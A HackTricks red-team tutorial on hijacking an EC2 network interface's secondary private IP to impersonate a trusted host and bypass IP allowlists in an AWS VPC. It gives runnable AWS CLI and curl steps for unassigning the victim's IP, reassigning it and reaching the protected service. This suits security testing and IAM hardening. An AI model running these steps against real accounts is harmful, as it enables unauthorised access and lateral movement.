AWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)

Reading time: 3 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Abuse ec2:UnassignPrivateIpAddresses and ec2:AssignPrivateIpAddresses to steal a victim ENI’s secondary private IP and move it to an attacker ENI in the same subnet/AZ. Many internal services and security groups gate access by specific private IPs. By moving that secondary address, the attacker impersonates the trusted host at L3 and can reach allowlisted services.

Prereqs:

  • Permissions: ec2:DescribeNetworkInterfaces, ec2:UnassignPrivateIpAddresses on the victim ENI ARN, and ec2:AssignPrivateIpAddresses on the attacker ENI ARN.
  • Both ENIs must be in the same subnet/AZ. The target address must be a secondary IP (primary cannot be unassigned).

Variables:

  • REGION=us-east-1
  • VICTIM_ENI=
  • ATTACKER_ENI=
  • PROTECTED_SG= # SG on a target service that allows only $HIJACK_IP
  • PROTECTED_HOST=

Steps:

  1. Pick a secondary IP from the victim ENI
bash
aws ec2 describe-network-interfaces --network-interface-ids $VICTIM_ENI --region $REGION   --query NetworkInterfaces[0].PrivateIpAddresses[?Primary==`false`].PrivateIpAddress --output text | head -n1 | tee HIJACK_IP
export HIJACK_IP=$(cat HIJACK_IP)
  1. Ensure the protected host allows only that IP (idempotent). If using SG-to-SG rules instead, skip.
bash
aws ec2 authorize-security-group-ingress --group-id $PROTECTED_SG --protocol tcp --port 80   --cidr "$HIJACK_IP/32" --region $REGION || true
  1. Baseline: from attacker instance, request to PROTECTED_HOST should fail without spoofed source (e.g., over SSM/SSH)
bash
curl -sS --max-time 3 http://$PROTECTED_HOST || true
  1. Unassign the secondary IP from the victim ENI
bash
aws ec2 unassign-private-ip-addresses --network-interface-id $VICTIM_ENI   --private-ip-addresses $HIJACK_IP --region $REGION
  1. Assign the same IP to the attacker ENI (on AWS CLI v1 add --allow-reassignment)
bash
aws ec2 assign-private-ip-addresses --network-interface-id $ATTACKER_ENI   --private-ip-addresses $HIJACK_IP --region $REGION
  1. Verify ownership moved
bash
aws ec2 describe-network-interfaces --network-interface-ids $ATTACKER_ENI --region $REGION   --query NetworkInterfaces[0].PrivateIpAddresses[].PrivateIpAddress --output text | grep -w $HIJACK_IP
  1. From the attacker instance, source-bind to the hijacked IP to reach the protected host (ensure the IP is configured on the OS; if not, add it with ip addr add $HIJACK_IP/<mask> dev eth0)
bash
curl --interface $HIJACK_IP -sS http://$PROTECTED_HOST -o /tmp/poc.out && head -c 80 /tmp/poc.out

Impact

  • Bypass IP allowlists and impersonate trusted hosts within the VPC by moving secondary private IPs between ENIs in the same subnet/AZ.
  • Reach internal services that gate access by specific source IPs, enabling lateral movement and data access.